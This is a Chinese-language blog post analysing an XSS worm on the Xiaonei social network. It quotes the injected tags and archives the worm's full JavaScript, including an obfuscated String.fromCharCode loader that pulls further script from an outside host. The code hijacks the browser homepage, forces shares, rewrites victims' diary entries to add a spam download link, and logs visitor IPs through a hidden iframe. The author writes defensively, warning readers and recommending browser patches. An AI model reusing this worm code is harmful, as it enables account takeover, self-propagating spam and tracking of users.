本日志只研究了
英国人疯了。。出的什么题目啊!!!!
http://blog.xiaonei.com/GetEntry.do?id=343568285&owner=221076834 (*DO NOT FOLLOW THIS LINK*)
实际产生作用的应该是日志尾部的这么几行代码:
<img width="0" height="0" src="http://xss0211.111.no1date.cn/s.php"/>
<script ik="myyoumin" src="http://fmn029.xnimg.cn/fmn029/tribe/20090316/07/30/A087039690816UPL.asx" type="text/javascript">
</script>
</p>
<br/>
<div height="0"> <img id="mydoit" width="0" height="0" src="http://static.xiaonei.com.f/img/temp/fm/20090219.jpg" display="none"/>
</div>
第一个地址应该是包含了跨站攻击脚本(XSS),但是这个地址(no1date.cn)已经无法解析了。
第二个链接含有一个伪造的asx文件,其中包含代码:
var l=document.createElement("script");
l.src=http://love.avtupian.com/a/x/xOO1.jpg; //Don’t follow this link
l.type="text/javascript";
document.getElementsByTagName("head").item(0).appendChild(l);
链接的图片实际是一段javascript代码,全文在最后,应该与浏览器的漏洞有关。
作用有自动分享,并修改日志,最后还会记录访问者ip。其中还是有几个网址不能解析,故无法分析其作用。
这个图片仍旧存在,请不要点击上面的链接。
第三个地址的图片也无法打开,看其地址(.com.f),可能是写错了。
结论:本想知道这只是一个单纯的XSS攻击还是会往你的计算机上安插木马,现在仍旧不能确定。
保险起见可参照那个
校内网被挂马,有效解决方案
http://blog.xiaonei.com/GetEntry.do?id=396704329&owner=225886057
查杀一下。如果没有在系统中发现上贴所述文件和注册表项,也不用太担心。
但最重要的是,请运行Windows Update为系统特别是IE打上补丁。
实际上,推荐使用非IE内核浏览器,比如Firefox, Google Chrome, Opera, Safari。
最后是攻击代码存档,来自前述的xOO1.jpg:
function killErrors() {return true;}
window.onerror=killErrors;
function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}
function hit(aaa){
for(i=1;i<10;i++){
if(window.xxx!=1){
defaul_home(aaa);
}
}
window.xxx=1;
}
//document.all.blogpage.onclick=Function("hit(document.all.blogpage)");
//----------------------------
var mydata;
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
getinfo();
function getinfo(){
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
var mysummary=document.getElementById("summary").innerText;
var mylargeurl=document.getElementById("largeurl").value;
mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
mydata=mydata.replace(/\//g,'%2F');
}
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
setTimeout("appendjs()",2600);
function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" onerror="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================
var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;
var visitorID=$("logo").firstChild.firstChild.href;
var IDs=visitorID.indexOf("?id=");
visitorID=visitorID.substring(IDs+4);
var mydomain=document.location.href;
var mydomaint=mydomain.indexOf("blog.xiaonei.com");
var myo=mydomain.indexOf(visitorID);
if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}
function get_my_blogurl(){
var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
return as;
}
function add_my_blogurl(r){
var mybloglist=r.responseText;
var myurls;var blogids;var blogide;
for(i=0;i<10;i++){
myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
//mybloglist=mybloglist.substring(myurls+10);
//myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
if(myurls!=-1){
mybloglist=mybloglist.substring(myurls);
myurls=mybloglist.indexOf('"');
mybloglist=mybloglist.substring(myurls+1);
myurls=mybloglist.indexOf('"');
myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
myblogid[i]=myblogurl[i].substring(blogids+4,blogide);
//document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
}else{break;}
}
get_my_testself();
}
//-------------------------------------
function get_my_testself(){
targetblogurlid=0;
for(i=0;i<myblogid.length;i++){
//var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
var xhr2=createXMLHttpRequest();
if(xhr2){
xhr2.open("GET",url,false);
xhr2.send();guest2=xhr2.responseText;
}
var mycheckit=guest2.indexOf("skycn");
if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
}
if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
function add_my_form(r){
guest=guest2;
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);
var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
mytitle=mytitle.replace(/&/g,'&').replace(/"/g,'\"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);
var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&/g,'&').replace(/"/g,'\"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mybody+='<p><br>最后推荐一个东西:<br><br>发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!<br>下载地址:<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);
myxiugai();
}
function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
fdata=fdata.replace(/\//g,'%2F');
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');
if(xhr){
xhr.open("POST",userurl,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(fdata);
}
}
//--------------------------------
function createXMLHttpRequest(){
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i<MSXML.length;i++)
{
try
{
XMLhttpObject=new ActiveXObject(MSXML[i]);
break;
}
catch (ex) {
}
}
}
return XMLhttpObject;
}
//---------------------------------------
setTimeout("myshua()",200);
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}
//注:String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div
的转换结果为
var s=document.createElement('script'); s.src='http://love.avtupian.com/a/x/s.jpg'; s.type='text/javascript'; document.getElementsByTagName('head').item(0).appendChild(s);
s.jpg所含 代码为 :(作用应该是提交分享)
var sdata;var guest;
sdata=document.all.eer.innerHTML;
if(!window.sss){
get_tsc();
window.sss=1;
}
function get_tsc(){
var xhr=createXMLHttpRequest();
var url;var guest;
var tdata=sdata+'%22%7D';
url="http://share.xiaonei.com/share/popup.do";
if(xhr){
xhr.open("POST",url,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(tdata);guest=xhr.responseText;
}
var indexs=guest.indexOf("tsc_popShare");
guest=guest.substring(indexs+13);
indexs=guest.indexOf('"');
guest=guest.substring(indexs+1);
indexs=guest.indexOf('"');
guest=guest.substring(0,indexs);
var mytsc=guest;
tdata="";
tdata=sdata;
tdata+='%22%2C%22sendcomment%22%3A%22on%22%2C%22action%22%3A%22add%22%2C%22auth%22%3A%2299%22%2C%22body%22%3A%22';
tdata+='';
tdata+='%22%7D';
tdata="tsc="+mytsc+"&"+tdata;
var url="http://share.xiaonei.com/share/submit.do";
if(xhr){
xhr.open("POST",url,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(tdata);guest=xhr.responseText;
}
}
function createXMLHttpRequest(){
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i<MSXML.length;i++)
{
try
{
XMLhttpObject=new ActiveXObject(MSXML[i]);
break;
}
catch (ex) {
}
}
}
return XMLhttpObject;
}
Tools 
Send a private message
Subscribe to RSS feed
Tell a friend
Add to My MSN
Add to your network
Sign up for alerts
